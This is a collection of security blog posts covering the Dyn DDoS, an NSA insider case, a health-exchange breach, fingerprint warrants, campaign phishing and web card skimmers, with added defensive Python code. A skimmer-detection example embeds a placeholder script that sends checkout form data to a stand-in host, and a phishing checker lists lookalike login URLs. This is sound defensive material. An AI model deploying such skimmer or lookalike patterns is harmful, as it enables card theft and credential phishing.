The Day The Internet Died

Well, not exactly, but close.  And it was not due to pictures of Kim Kardashian.

Here is what happened.

When you type in the name of a website to visit, say, the Internet needs to translate that name into an address.  That address might look like .

The software that translates those names to numbers is called DNS or Domain Name System.  DNS services are provided by many different companies, but, typically, any given web site uses one of these providers.  The big providers work hard to provide a robust and speedy service because to load a single web page may require many DNS lookups.

One provider that a lot of big websites use is called Dyn (pronounced dine).  Today Dyn was attacked by hackers.  The attack technique is called a Distributed Denial of Service Attack or DDoS.  DDoS is a fancy term for drowning a web site in far more traffic than it can handle until it cannot perform the tasks that customers expect it to do.

In this case, customers included sites like Amazon, Paypal, Twitter, Spotify and many others.  These sites were not down, it was just that customers could not get to them.
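The single-provider dependency described above is something a site owner can check for. The script below is an added example, not code from the original post: it groups a zone's nameservers by operator and flags zones where every nameserver sits with one provider. Zone names and nameserver hostnames are constructed placeholders under .example, and the two-label operator rule is a simplification.

```python
"""Flag zones whose authoritative nameservers all sit with one DNS operator.
Added example, not from the original post.  Zone names and nameserver
hostnames are constructed placeholders under .example."""

# Constructed input: the kind of answer `dig NS <zone>` would return.
SAMPLE_NS = {
    "one-provider.example": [
        "ns1.provider-a.example.", "ns2.provider-a.example.",
        "ns3.provider-a.example.", "ns4.provider-a.example.",
    ],
    "two-providers.example": [
        "ns1.provider-a.example.", "ns2.provider-a.example.",
        "ns-10.provider-b.example.", "ns-11.provider-b.example.",
    ],
}


def provider_of(ns_host: str) -> str:
    """Approximate the operator of a nameserver by its last two DNS labels.
    Assumption: production code should use the Public Suffix List instead,
    since two labels are wrong for suffixes such as co.uk."""
    labels = ns_host.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def assess_zone(zone: str, ns_hosts: list) -> dict:
    """Group nameservers by operator and say whether one outage takes the
    whole zone offline."""
    providers = {}
    for host in ns_hosts:
        providers.setdefault(provider_of(host), []).append(host.rstrip("."))
    single = len(providers) == 1
    if single:
        finding = (f"all {len(ns_hosts)} nameservers depend on "
                   f"{next(iter(providers))}; an outage there makes the zone unresolvable")
    else:
        finding = (f"{len(providers)} independent operators; resolvers can still "
                   "reach the survivors if one is knocked out")
    return {"zone": zone, "providers": providers,
            "single_provider": single, "finding": finding}


def assess_all(ns_map=None) -> list:
    """Assess every zone in the map (defaults to the constructed sample)."""
    return [assess_zone(z, hosts) for z, hosts in (ns_map or SAMPLE_NS).items()]


if __name__ == "__main__":
    for result in assess_all():
        print(f"{result['zone']}: {result['finding']}")
```

Feed it the real NS records for your own zones to see whether an outage at one provider would take you off the Internet along with everyone else.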

The attacks started on the east coast, but added the west coast later.  Here is a map that pictures where the worst of the attack was.  In this picture from, red is bad.


There were multiple attacks, both yesterday and today.  The attackers would attack the site for a few hours, the attack would let up and then start over again.  For the moment, the attack seems to be over, but that doesn’t mean that it won’t start back up again tomorrow, Monday or in two weeks.

You may remember I wrote about the DDoS attack against Brian Krebs' web site and the hosting provider OVH.  Those two attacks were massive – 600 gigabits per second in the Krebs attack and over 1 Tb per second in the OVH attack.  The attackers used zombie security cameras and DVRs and the Mirai attack software to launch these two attacks.

After these attacks, the attacker posted the Mirai software online for free and other attackers have downloaded it and modified it, but it still uses cameras and other Internet of Things devices that have the default factory passwords in place.

As of now, we don’t know how big this attack was, but we do know that at least part of it was based on the Mirai software.  And that it was large.  No, HUGE.

It is estimated that the network of compromised Internet of Things devices, just in the Mirai network, includes at least a half million devices.  Earlier reports said that the number of devices participating in this attack was only a fraction of the total 500,000 – which means that the attack could get much bigger and badder.

The problem with “fixing” this problem is that it means one of two things: fixing the likely millions of compromised Internet of Things devices that are part of some attack network, or shutting those devices down – disconnecting them from the Internet.

The first option is almost impossible.  It would require a massive effort to find the owners of all these devices, contact them, remove the malware and install patches if required.  ISPs don’t want to do this because it would be very expensive and they don’t have the margin to do that.

The second option has potential legal problems – can the ISP disconnect those users?  Some people would say that the actions of the infected devices, intentional or not, likely violate the ISP’s terms of service, so the ISP could shut them down.  However, remember that for most users, if the camera is at their home or business, shutting down the camera would likely mean kicking everyone at the home or business off the Internet.  ISPs don’t want to do that because it will tick off customers, who might leave.

Since there is no requirement for users to change the default password in order to get their cameras to work, many users don’t change them.  Vendors COULD force the users to create a unique strong password when they install their IoT devices, but users forget them and that causes tech support calls, the cost of which comes out of profit.

As a result of all these unpalatable choices, the problem is likely to continue into the future for quite a while.

Next time, instead of Twitter going down, maybe they will attack the banking infrastructure or the power grid.  The good news is that most election systems are stuck way back in the stone age and they are more likely to suffer from hanging chads than hackers.

Until IoT manufacturers and owners decide to take security seriously – and I am not counting on that happening any time soon – these attacks will only get worse.

So, get ready for more attacks.

One thing to consider.  If your firm is attacked, how does that impact your business and do you have a plan to deal with it?

The thousands of web sites that were down yesterday and today were, for the most part, irrelevant collateral damage to the attacks.  Next time your site could be part of the collateral damage.  Are you ready?

Information for this post came from Motherboard and Wired.



The Insider Threat – At The NSA!

Photo from Flickr; Courtesy Fort Meade public affairs office

Some of you probably remember Edward Snowden (just kidding!).  Snowden was a Booz, Allen, Hamilton employee, on contract to the NSA.  Well now there is another Snowden at Booz.

Booz has annual revenue in excess of $5 billion and has contracts all over the federal government.

Earlier this month, the feds arrested Harold Thomas Martin III, another Booz employee assigned to the NSA.  Remember that package of cyber exploits that hit the dark web a couple of months ago that was thought to be an NSA toolkit lost in the wild?  Well, the feds are saying that was the work of Martin.  Earlier this month they arrested Martin and charged him with theft of government property and unauthorized removal and retention of classified materials.

If that was all, it would be an interesting story, but not news worthy.

As the story unfolds, the feds are now saying that they have found 50,000,000,000,000 bytes of stolen data in his house and car, most of it out in the open (although I am not sure that makes much of a difference under the circumstances).  If you are not sure how to read a number with that many zeros, it is 50,000 gigabytes or 50 terabytes.

The 50,000 gigabyte number, the court filings say, is a conservative number, so it is likely more.

If we were talking about Netflix standard definition movies to compare with, streaming 24 hours a day, 7 days a week, that much data represents watching Netflix, non-stop for almost 6 years.  If the movies were HD, it only represents 2-3 years of 24×7 watching.

Martin, who lives in Glen Burnie, MD, near NSA HQ, has apparently been taking this data since 1996.  That makes it one of the longest running undetected cases of espionage ever.

Unlike Snowden however, it appears, so far, that he didn’t have a goal to release this data or sell it to the Ruskies, but rather, he was hoarding it.  AT LEAST, THAT IS WHAT THEY ARE SAYING NOW.

For the NSA, this is another huge black eye.

For Booz, Allen, Hamilton, it (hopefully) makes government customers leery of their ability to protect classified customer information.  First Snowden and now Martin.

For average citizens, it should make them skeptical of the government’s claims that information that is shared with them can realistically be protected.  Certainly it should call into question the government’s ability – or for that matter anyone’s ability – to keep millions of encryption keys secret.

This is the downside of the digital world.  If he had to carry those 50,000 gigabytes of data out in paper, it would represent 25 billion pages of text – definitely harder to steal and even harder to store.

It also points to the insider threat problem at most companies – who are likely not as secure as the NSA.

This is likely not the end of this story.  All I can say is holy cow!

Information for this post came from The Washington Post and USA Today.


Challenges of Electronic Health Records

You may need a scorecard to keep track of the players, but ponder this.

Codman Square Health Center in Boston reported a breach to HHS.  However, it was not THEIR system that was breached.

Codman participates in a regional Health Information Exchange, the New England Healthcare Exchange, a mandated mechanism for doctors to exchange information with other covered entities, as part of the Affordable Care Act.

An employee of an outside vendor accessed the exchange using a Codman employee’s login information.  With this login they were able to access a few of Codman Square Health’s own patients’ records, but also thousands of records stored on the exchange that belonged to other providers.  These are records that Codman Square Health had no legitimate permission to access.

Codman Square Health said that the data that was accessed includes names, addresses, birth dates, gender, medical services, payor information, insurance information and Social Security numbers.

But there is a challenge.  Of the data accessed, 140 of those records belonged to Codman Square Health’s patients.  But there were 4,000 other records that were accessed.  These were not Codman Square Health’s clients, so they don’t have access to those records and have no way to tell them that their data was breached.  HIPAA regulations ASSUMED that a provider would have access to the addresses of the patients in the breached records, but in this case, they do not know who those people are.

Those 4,000 victims may never know that their data was hacked.

Will people be unwilling to share their data on the exchange?  Do they even have the option not to share the data?

More importantly, do the regulations need to be fixed?  How do we protect people – which is really what is important?

If we are going to store health care information electronically and share it between parties, then we are going to need to figure out how to deal with breaches that affect multiple parties.

One possibility is to require the Health Exchange to make the notifications, possibly billing the cost back to the responsible party or parties.

But it also means that HIEs need to deal with the security issues.  If they do not, then Health Exchanges may not survive.


Information for this post came from Fierce Health IT.



Feds Serve Warrant Demanding Fingerprints of Everyone in the Building

As has been predicted, in a court filing from May 2016, the DoJ authorized the cops to

“depress the fingerprints and thumbprints of every person who is located at the subject premises during the execution of the search and who is reasonably believed by law enforcement to be the user of a fingerprint sensor-enabled device that is located at the subject premises and falls within the scope of the warrant.”

The US Attorney for the Central District of California said that while the government doesn’t know what people or devices might be in the premises, it has demonstrated probable cause that evidence may exist at the search location and needs the ability to gain access to those devices and maintain access in order to search them.

“The warrant authorizes the seizure of passwords, encryption keys and other access devices that may be necessary to access the device.”

Since companies like Apple and Google have been somewhat less than cooperative with the Feds (witness the FBI-Apple lawsuit over the use of the All Writs Act), the Feds have gotten creative.

While the feds might be able to physically force you to put your finger on your phone, and while the warrant may say that they can make you turn over your password, they can’t choke it out of you – at least not legally.

If there is a warrant and the warrant asks you to give them your password, you at least have the option to go before a judge and make your case that you shouldn’t have to do that.  You may have to go to jail in the meantime, so you have to decide how important it is to you.

Apparently, this is not the first time that police got a court’s authorization to make people press their fingers onto a phone.  That distinction may belong to a case in Los Angeles in February of this year.

While the search warrant may require a person to press a finger on the phone, that may or may not actually work, depending on things like how long it has been since the phone was last unlocked.

If that is a concern for you, then the experts say, do not use the fingerprint reader to unlock the phone.

Most – but not all – courts have ruled that the police cannot compel you to enter your password.  In most courts’ interpretation, that is too much like compelling testimony in violation of the Fifth Amendment.

In one case, the police had someone create a fake fingerprint to fool a Galaxy 6.  That worked, and the person who did that said that the fake fingerprint would also work on a Galaxy 7 and an iPhone 6.

Depending on what they are looking for – such as texts (SMS messages) – those may be available from the phone’s carrier.  If they are looking for iMessages, WhatsApp messages or other digital messages, those messages are not available from the carrier, so the only way to get them would be to unlock the phone.

On some phones the user can set the amount of time that can pass since the last fingerprint scan before the password is required and also the number of failed fingerprint attempts that require a password be entered.

Assuming the phone in question allows this (my Galaxy Note does not appear to have those features), then setting those thresholds lower makes this technique less effective.  For example, setting the failed-fingerprint-read threshold to one before requiring a password makes this warrant technique less useful, but it likely also requires you to enter your password more frequently.

As always, we have a trade-off between security and convenience.

If bad guys are after you, they may also “ask” you to put your finger on the phone to unlock it, but in that case, if it doesn’t work, they might “ask” you to unlock the phone as an alternative to killing you.

It appears that if security is your concern, you should not use the fingerprint, just like you should not use a 4 digit numeric PIN.  An 8-16 character alphanumeric password is quite effective at stymieing any current brute force techniques.  And less convenient for you.  Security.  Convenience.  Pick one.

This is a cat and mouse game, so both the bad guys and the police are advancing the technology while the law is desperately trying to catch up.

Information for this post came from Forbes.



Why Employee Training is a CRITICAL Component of Security Training

According to Buzzfeed, nine days after Hillary Clinton had won big on Super Tuesday, the Russians launched their cyber attack on her campaign.

The Russians sent malicious emails to all of her senior campaign staff.  The emails looked like standard Google GMail emails alerting to suspicious activity on their accounts and asked them to click on the link.  The link led to a page, likely hosted in Russia, that looked very much like a GMail password reset page.  Unless they checked the address in the address bar.

As soon as they entered their email and password, the Russians had full, unfettered access to all of their emails from that point forward.
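“Unless they checked the address in the address bar” is the whole defense against this kind of page. The script below is an added example, not code from the original post: it applies the check a careful recipient (or a mail filter) would make, pulling out the host a link really connects to and asking whether it is actually under the mail provider’s domain. The legitimate-domain list and the sample links are constructed assumptions.

```python
"""Decide whether a link in an "account alert" mail really lands on the
claimed provider's domain.  Added example, not from the original post; the
legitimate-domain list is an assumption and the sample URLs are constructed."""
from urllib.parse import urlsplit

# Assumption: the domains this organisation's mail provider legitimately uses.
LEGITIMATE_DOMAINS = {"google.com", "accounts.google.com", "mail.google.com"}


def connecting_host(url: str) -> str:
    """Return the hostname the browser would actually connect to.
    .hostname already discards any user:pass@ prefix and :port."""
    parts = urlsplit(url.strip())
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"unsupported scheme: {parts.scheme!r}")
    return (parts.hostname or "").lower().rstrip(".")


def is_under(host: str, domain: str) -> bool:
    """True if host equals domain or is a genuine subdomain of it.
    'accounts.google.com.evil.example' is NOT under google.com."""
    return host == domain or host.endswith("." + domain)


def classify_link(url: str) -> dict:
    """Return the real host, whether it is legitimate, and why it looks off."""
    parts = urlsplit(url.strip())
    host = connecting_host(url)
    legitimate = any(is_under(host, d) for d in LEGITIMATE_DOMAINS)
    reasons = []
    if not legitimate:
        reasons.append(f"host {host!r} is not under a legitimate domain")
        # The brand name buried inside a foreign hostname is the classic cue.
        if "google" in host:
            reasons.append("brand name appears in the hostname but not as its domain")
    if parts.username:
        reasons.append("user@ prefix in the URL hides the real host in the address bar")
    if parts.scheme == "http":
        reasons.append("plain http: a real password-reset page would use https")
    return {"host": host, "legitimate": legitimate,
            "suspicious": (not legitimate) or bool(reasons), "reasons": reasons}


# Constructed sample links: one genuine, two of the lookalike shapes the post describes.
SAMPLE_LINKS = [
    "https://accounts.google.com/signin/recovery",
    "http://accounts.google.com.security-alert.example/reset",
    "https://accounts.google.com@login-check.example/",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        verdict = classify_link(link)
        print(link, "->", "OK" if not verdict["suspicious"] else verdict["reasons"])
```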

POINT #1: Call me paranoid, but from a security standpoint does it really make sense to use GMail for the official campaign email system for a presidential campaign?  Sure, that makes sense for uncle Joe in Pittsburgh, but did it never occur to anyone that this might not be very smart?

POINT #2: Did campaign workers receive any cyber security training?  That is a pretty normal phishing technique.  Out of all the people who received these emails, did not even one of them question it?

POINT #3:  If they did question it, did the campaign have a chief cyber security staffer to send the concern to?  Not physical security, but cyber security.

But I digress….

Since that worked so well, the Russians tried the same trick with the Democratic National Committee.

POINT #4: Did (or does) the DNC train its people on phishing?

And then, being successful beyond their dreams, they tried the same trick with the Democratic Congressional Campaign Committee.

POINT #5:   I am not even going to ask.

By mid June, the first leak had been identified and the DNC emails started coming to light.

I assume that others started to panic at this point and those who didn’t use email (like Trump, apparently) were laughing.

The group that orchestrated this is known as APT 28 or Fancy Bear, but there is nothing fancy about this attack.  In fact, a fifth grader could have likely done it.

In a rare display of political annoyance, the White House definitively said last week that Russia did this.  There was no beating around the bush.  The Department of Defense piled on.  I am sure that there is a fair bit of classified evidence, but apparently, the government was convinced enough to publicly blame Putin.

If you want more details, please read the Buzzfeed article below, but for the purposes of this post, this is sufficient.

After reading this, I have a few thoughts and those thoughts apply to everyone – political parties on any side of the fence, businesses or private citizens.

THOUGHT #1 : Email is private – until you hit the send button.  Beyond that, all bets are off.

THOUGHT #2: If you would be concerned, embarrassed or thrown in jail if that email appeared on the front page of the New York Post (or Wall Street Journal), DO NOT SEND IT!  You just cannot guarantee what will happen after you hit the send button.

THOUGHT #3:  At the very least, a private email server gives you some more control and the ability to monitor traffic.  BUT ONLY IF YOU DO IT RIGHT.  It is 10 times easier to do it wrong than to do it right.

THOUGHT #4: Encrypted email (and I don’t mean SSL based web mail) also helps, but again, the devil is in the details.  I have a few patents with my name on them in this area, so I think I understand the problem, what works and what doesn’t work.

THOUGHT #5: Training is critical.  Really.  Human beings are always the weak spot.  Period.  Invest in training.

THOUGHT #6: Monitoring and alerting is the next most critical thing.  If, by chance, the Ruskies accidentally logged in from Russia, alarm bells should have gone off.  There is no monitoring for users of GMail.  You are on your own.
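What “alarm bells” look like in practice is a rule over the login log. The script below is an added example, not code from the original post: it runs two checks over constructed login records, a login from a country the user has never logged in from, and two logins from different countries too close together for one person to have travelled. The log lines are constructed, and the country of each source IP is assumed to have been resolved by a geolocation step upstream.

```python
"""Alert on logins from a country a user has never used, and on two logins
from different countries too close together to be the same person.
Added example, not from the original post; log lines are constructed and
each IP's country is assumed to be resolved upstream."""
from datetime import datetime, timedelta

# Constructed sample log: timestamp, user, source IP (documentation ranges),
# resolved country.
SAMPLE_LOG = """\
2016-03-10T08:02:11Z staffer1 198.51.100.7 US
2016-03-10T13:45:02Z staffer1 198.51.100.7 US
2016-03-11T09:10:40Z staffer2 203.0.113.22 US
2016-03-19T04:17:55Z staffer1 192.0.2.45 RU
2016-03-19T04:59:03Z staffer2 203.0.113.22 US
2016-03-19T05:30:12Z staffer2 192.0.2.46 RU
"""

# Assumption: a tunable window; two countries inside it is "impossible travel".
MAX_TRAVEL = timedelta(hours=4)


def parse(line: str):
    ts, user, ip, country = line.split()
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), user, ip, country


def detect(log_text: str, known=None) -> list:
    """Return alert strings.  `known` maps user -> set of baseline countries;
    without it, the countries seen before the first alert form the baseline.
    A flagged login is not learned into the baseline."""
    seen = {u: set(c) for u, c in (known or {}).items()}
    last = {}      # user -> (timestamp, country) of the previous login
    alerts = []
    for line in log_text.strip().splitlines():
        ts, user, ip, country = parse(line)
        base = seen.setdefault(user, set())
        flagged = False
        if base and country not in base:
            flagged = True
            alerts.append(f"{ts:%Y-%m-%d %H:%M} NEW_COUNTRY user={user} ip={ip} "
                          f"country={country} baseline={sorted(base)}")
        if user in last:
            prev_ts, prev_country = last[user]
            if prev_country != country and ts - prev_ts < MAX_TRAVEL:
                flagged = True
                alerts.append(f"{ts:%Y-%m-%d %H:%M} IMPOSSIBLE_TRAVEL user={user} "
                              f"{prev_country}->{country} in {ts - prev_ts}")
        if not flagged:
            base.add(country)
        last[user] = (ts, country)
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```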

THOUGHT #7:  I like Sergey Brin and Larry Page.  Google is a great search engine.  Not so much is it a great enterprise email solution, even though they would argue with me.  Vehemently.  But then, I am calling their baby ugly.  U.G.L.Y!  Sorry.

THOUGHT #8, 9 and 10:  If security and privacy is important to your organization – and they may not be – then treat it that way.  Find the expertise and hire it (#8).  Listen to what they tell you to do (#9).  And tell your users that this is not a democracy and they don’t get a vote on whether or not to follow the security policies (#10).

I know that is harsh, but the question is, are security and privacy important to you?

Information for this post came from Buzzfeed.


Hackers Use Virtual Skimmers To Steal Credit Cards From Web Sites

You’ve probably heard about credit card skimmers that hackers attach to everything from gas pumps to ATMs to self checkout terminals at grocery stores, all in an effort to steal your credit card info.

As more stores go to chip based credit cards where stealing the information off the stripe won’t let hackers use that card in the physical world, the hackers have adapted their actions to the virtual world.  And, not surprisingly, virtual merchants are denying reality like physical merchants did until the wakeup calls were received from the likes of Target, Home Depot and Wendy’s.

So what are they doing?  I’m glad you asked!

They are installing virtual skimmers on hackable web sites.  With a virtual skimmer, the hacker inserts himself or herself between the user and the credit card processor on the web page where it captures your credit card.

This technique will only work if the web site can be compromised so that the hacker can modify the correct web page.

This particular attack works on the Magento ecommerce platform that many sites are built on top of.  Especially for those sites that never install patches or do not install them promptly, if the hackers can find the site before the patches are installed, they may be able to add their virtual skimmer to the site.  It is highly unlikely that those sites would detect that the site had been modified because, like with a physical world skimmer, after the data is captured and sent to China, Russia or Ukraine, it is forwarded on to the credit card processor.  The site gets its money and the hacker gets the credit card data.
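Because the transaction still completes, the only thing that changes on the site is the checkout page itself, so that is where to look. The script below is an added example, not code from the original post or from Magento: it snapshots the inline scripts of a known-clean checkout page and then reports any external script from an unexpected host, any inline script missing from the snapshot, and the host such a script talks to. The pages, the allowed-host list and the injected script are constructed placeholders.

```python
"""Detect unexpected scripts on a checkout page by comparing it with a
known-good snapshot.  Added example, not from the original post; the pages,
the allowed hosts and the injected script are constructed placeholders."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumption: hosts the checkout page legitimately loads scripts from or
# sends data to.  Any other host found in a script is reported.
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example", "payments.processor.example"}
URL_RE = re.compile(r"https?://[^\s'\"<>]+")

# Constructed known-good page, snapshotted while the site was known to be clean.
CLEAN_PAGE = """<html><body>
<form id="checkout"><input name="cc_number"><input name="cc_cvv"></form>
<script src="https://cdn.shop.example/checkout.js"></script>
<script>
  initCheckout("payments.processor.example");
</script>
</body></html>"""

# Constructed: the same page with one extra inline script, the shape of the
# "virtual skimmer" the post describes (its function names are placeholders).
TAMPERED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<script>\n  onSubmit(function () { sendTo("https://stats-collect.example/c", formFields()); });\n'
    "</script>\n</body>",
)


class ScriptCollector(HTMLParser):
    """Collect external script sources and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self.inline.append("")

    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def inline_hashes(html: str) -> set:
    """Baseline: sha256 of every inline script body on the clean page."""
    p = ScriptCollector()
    p.feed(html)
    return {hashlib.sha256(b.strip().encode()).hexdigest() for b in p.inline}


def audit_page(html: str, baseline: set) -> list:
    """Findings: external scripts from unknown hosts, inline scripts absent
    from the baseline, and any unknown host such a script contacts."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:
        host = urlsplit(src).hostname
        if host and host not in ALLOWED_HOSTS:
            findings.append(f"external script from unexpected host: {host}")
    for body in p.inline:
        digest = hashlib.sha256(body.strip().encode()).hexdigest()
        if digest in baseline:
            continue
        findings.append(f"inline script not in baseline (sha256 {digest[:12]}...)")
        for url in URL_RE.findall(body):
            host = urlsplit(url).hostname
            if host and host not in ALLOWED_HOSTS:
                findings.append(f"  -> it contacts {host}")
    return findings
```

Run `audit_page(TAMPERED_PAGE, inline_hashes(CLEAN_PAGE))` on a schedule against the live checkout page and a clean result is an empty list; any new inline script or foreign host is exactly the change a skimmer makes.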

So far, a Dutch researcher has found the virtual skimmer software on 6,000 online stores.  He says that number is growing at a rate of 85 new stores every day.  The good news (for the hacker) is that these are mostly small stores and are 99% unlikely to figure out that they have been hacked unless the FBI comes to visit them.  That is unlikely to happen because the FBI is busy with the likes of Vera Bradley.

What this means is that these sites will continue to let the hackers steal credit card data until the banks figure out that they are the source and cancel their credit card merchant account and sue them.  Then the site goes out of business because most of them are small enough not to have cyber insurance.  Of course, going out of business may or may not cause the lawsuit to go away, so for at least some of those web sites, the bank will probably get a default judgement against them and that will cause them to, possibly, have to file for bankruptcy protection or pay off the bank.  Not a pretty picture, to be honest.

So who are these sites that have a virtual skimmer installed?

One is the Republican Senatorial Committee’s online store.

When The Register asked the Republican Senatorial Committee if they had secured their web site or if customers coming to their web site were safe from hackers, they got the silent treatment.  My suggestion would be for people to not provide their credit card to any Republican web site until we have a positive statement from them that they have fixed the problem and that using your credit card there is safe again.  Obviously, it is embarrassing, especially during an election cycle, to tell donors that you have been hacked.  The researcher said that he told the Republicans about the problem and they also did not respond to him, but that they removed that script.

The researcher said that as far as he can tell this particular hack has been going on since May of last year, but unlike stopping the attack at Vera Bradley, stopping this attack would require getting at least tens of thousands of web sites to patch their software and likely hire someone to remove the malware. These site owners are small businesses, for the most part, and don’t have the skill to do it themselves.

Some of the sites that the researcher contacted said “thanks, but we are safe, no worries” or “we are safe because we use https” or “we are safe because we have the Symantec security seal”.  That is the denial part I was talking about earlier.

The researcher has discovered 9 variations of the scripts.  Does that mean 9 hacking organizations are using this technique or just that the developer has a commitment to continuous improvement and is iterating the technology?

What is likely to occur, now that the media is reporting this, is for other hackers to figure out how to replicate this and find other unpatched web sites that can be infected, whether they are running Magento or something else.

eCommerce web sites should pay attention to this as they may be held liable by the credit card companies and have to foot the bill for the fraud.  And, of course, they need to install patches very quickly so that hackers don’t have a window to attack them prior to installing the patches.

For customers, watch your statements, but even more important, turn on the text alerts that almost all banks offer to get a text when your card has been used.  If people would do that, it would kill the credit card theft business overnight because cards would be good for one fraudulent transaction, at most, which is a pretty slim payday.


Information for this post came from The Register.
